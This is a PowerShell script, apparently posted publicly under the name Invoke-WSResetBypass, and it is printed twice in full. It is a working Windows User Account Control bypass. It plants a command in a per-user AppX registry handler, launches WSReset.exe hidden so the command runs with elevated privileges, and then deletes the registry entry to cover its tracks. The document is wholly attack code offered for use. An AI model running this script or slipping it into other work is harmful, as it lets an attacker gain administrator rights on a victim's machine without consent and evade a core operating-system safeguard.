Y4er/Invoke-WSResetBypass.ps1

## Invoke-WSResetBypass.ps1
function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}
	function Invoke-WSResetBypass {
	Param (
	[String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
	)

	$CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
	$filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
	New-Item $CommandPath -Force \| Out-Null
	New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force \| Out-Null
	Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue \| Out-Null
	Write-Host "[+] Registry entry has been created successfully!"

	$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
	Write-Host "[+] Starting WSReset.exe"

	Write-Host "[+] Triggering payload.."
	Start-Sleep -Seconds 5

	if (Test-Path $filePath) {
	Remove-Item $filePath -Recurse -Force
	Write-Host "[+] Cleaning up registry entry"
	}
	}